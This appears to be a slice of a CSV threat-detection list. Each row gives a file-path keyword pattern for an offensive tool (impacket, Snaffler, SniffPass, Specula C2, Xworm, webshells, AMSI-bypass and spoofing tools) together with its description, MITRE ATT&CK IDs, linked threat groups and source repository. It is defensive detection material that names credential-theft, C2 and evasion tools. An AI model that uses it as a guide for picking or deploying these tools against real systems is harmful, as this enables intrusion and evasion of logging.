"*\smuggler.py*",".{0,1000}\\smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","18916"
"*\SmugglingCmdlet.csproj*",".{0,1000}\\SmugglingCmdlet\.csproj.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18917"
"*\SmugglingCmdlet.sln*",".{0,1000}\\SmugglingCmdlet\.sln.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18918"
"*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18919"
"*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18920"
"*\snaffler.py*",".{0,1000}\\snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","18921"
"*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18922"
"*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18923"
"*\sniffer.exe*",".{0,1000}\\sniffer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18924"
"*\sniffer.py*",".{0,1000}\\sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18925"
"*\sniffer.py*",".{0,1000}\\sniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","18926"
"*\sniffers\sniffer.py*",".{0,1000}\\sniffers\\sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","18927"
"*\SniffPass.chm*",".{0,1000}\\SniffPass\.chm.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18928"
"*\SniffPass.pdb*",".{0,1000}\\SniffPass\.pdb.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18929"
"*\sniffpass-x64*",".{0,1000}\\sniffpass\-x64.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18930"
"*\SnIpEr_SA Shell.php*",".{0,1000}\\SnIpEr_SA\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18931"
"*\snsenum.py*",".{0,1000}\\snsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18932"
"*\SOAPHound.csproj*",".{0,1000}\\SOAPHound\.csproj.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18933"
"*\SOAPHound.exe*",".{0,1000}\\SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18934"
"*\SOAPHound.sln*",".{0,1000}\\SOAPHound\.sln.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18935"
"*\SOAPHound\Enums\*",".{0,1000}\\SOAPHound\\Enums\\.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18936"
"*\SOAPHound\Program.cs*",".{0,1000}\\SOAPHound\\Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18937"
"*\SOAPHound-master*",".{0,1000}\\SOAPHound\-master.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18938"
"*\socks5proxy.py*",".{0,1000}\\socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","18939"
"*\Software\Kidlogger*",".{0,1000}\\Software\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","18957"
"*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\fun*",".{0,1000}\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#registry","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","18963"
"*\SOFTWARE\Policies\Sinclair Community College\Make Me Admin*",".{0,1000}\\SOFTWARE\\Policies\\Sinclair\sCommunity\sCollege\\Make\sMe\sAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#registry","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","18970"
"*\SOFTWARE\Sinclair Community College\Make Me Admin*",".{0,1000}\\SOFTWARE\\Sinclair\sCommunity\sCollege\\Make\sMe\sAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#registry","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","18971"
"*\SOFTWARE\Xworm*",".{0,1000}\\SOFTWARE\\Xworm.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#registry","N/A","10","","N/A","","","","18987"
"*\SolarFlare.exe*",".{0,1000}\\SolarFlare\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18989"
"*\somalifuscatorv2.log*",".{0,1000}\\somalifuscatorv2\.log.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","19019"
"*\Sophos Removal Tool.ps1*",".{0,1000}\\Sophos\sRemoval\sTool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19020"
"*\SortObjectCommand.cs",".{0,1000}\\SortObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19021"
"*\specagents.py*",".{0,1000}\\specagents\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19023"
"*\specmodule.py*",".{0,1000}\\specmodule\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19024"
"*\specpayload.py*",".{0,1000}\\specpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19025"
"*\specpromptpayload.py*",".{0,1000}\\specpromptpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19026"
"*\specula.py*",".{0,1000}\\specula\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19027"
"*\specula_com.dll*",".{0,1000}\\specula_com\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19028"
"*\specula_log.txt*",".{0,1000}\\specula_log\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19029"
"*\SpeculaApi.cpp*",".{0,1000}\\SpeculaApi\.cpp.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19030"
"*\SpeculaApi.dll*",".{0,1000}\\SpeculaApi\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19031"
"*\SpeculaApi.Specula*",".{0,1000}\\SpeculaApi\.Specula.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19032"
"*\SpeculaApi.x64.dll*",".{0,1000}\\SpeculaApi\.x64\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19033"
"*\spellbound-main*",".{0,1000}\\spellbound\-main.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19036"
"*\spellgen.py *",".{0,1000}\\spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19037"
"*\spellstager.py *",".{0,1000}\\spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19038"
"*\spider_plus.py*",".{0,1000}\\spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19039"
"*\Spider-Virus RAT v*.exe*",".{0,1000}\\Spider\-Virus\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19040"
"*\spinningteacup.py*",".{0,1000}\\spinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19041"
"*\SPNSearcher.exe*",".{0,1000}\\SPNSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19045"
"*\spoof.py*",".{0,1000}\\spoof\.py.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","19046"
"*\SpoofCmdLine\TheThing*",".{0,1000}\\SpoofCmdLine\\TheThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19047"
"*\spoofer.py*",".{0,1000}\\spoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","19048"
"*\spoofing-office-macro-master*",".{0,1000}\\spoofing\-office\-macro\-master.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","19049"
